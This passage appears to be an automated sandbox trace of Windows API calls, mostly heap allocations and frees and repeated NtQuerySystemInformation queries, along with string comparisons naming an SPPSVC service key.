hHeap=0x2026c630000) returned 1 [0272.090] GetProcessHeap () returned 0x2026c630000 [0272.090] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1c4) returned 0x2026d242610 [0272.090] GetProcessHeap () returned 0x2026c630000 [0272.090] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c693540 [0272.090] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfde08 | out: phModule=0xc751dfde08*=0x7ffcea380000) returned 1 [0272.091] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0272.091] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf30, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf30, ResultLength=0x0) returned 0x0 [0272.091] GetProcessHeap () returned 0x2026c630000 [0272.091] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8893f0 [0272.091] GetProcessHeap () returned 0x2026c630000 [0272.091] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d790e40 [0272.091] GetProcessHeap () returned 0x2026c630000 [0272.091] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d808320 [0272.091] GetProcessHeap () returned 0x2026c630000 [0272.091] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9cd0 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d889bb0 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692440 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7330e0 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805eb0 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9e80 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8897b0 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d242610 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c693540 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d790e40 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d808320 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9cd0 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8893f0 | out: hHeap=0x2026c630000) returned 1 [0272.092] GetProcessHeap () returned 0x2026c630000 [0272.092] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d791750 | out: hHeap=0x2026c630000) returned 1 [0272.093] GetProcessHeap () returned 0x2026c630000 [0272.093] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692cc0 | out: hHeap=0x2026c630000) returned 1 [0272.093] GetProcessHeap () returned 0x2026c630000 [0272.093] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889bb0 | out: hHeap=0x2026c630000) returned 1 [0272.093] GetProcessHeap () returned 0x2026c630000 [0272.093] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807820 | out: hHeap=0x2026c630000) returned 1 [0272.093] GetProcessHeap () returned 0x2026c630000 [0272.093] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9bf0 | out: hHeap=0x2026c630000) returned 1 [0272.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x20, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x28, ResultLength=0x0) [0272.094] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0272.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x28, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x28, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x28, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x28, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x28, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x28, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0272.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x20, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x20, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x20, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfded0, Length=0x28, ResultLength=0x0) [0272.103] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x28, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfded0, Length=0x28, ResultLength=0x0) [0272.111] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x28, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0272.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.125] GetProcessHeap () returned 0x2026c630000 [0272.125] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d7e8dc0 [0272.125] GetProcessHeap () returned 0x2026c630000 [0272.125] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65bf40 [0272.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x50, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x50, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x50, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, 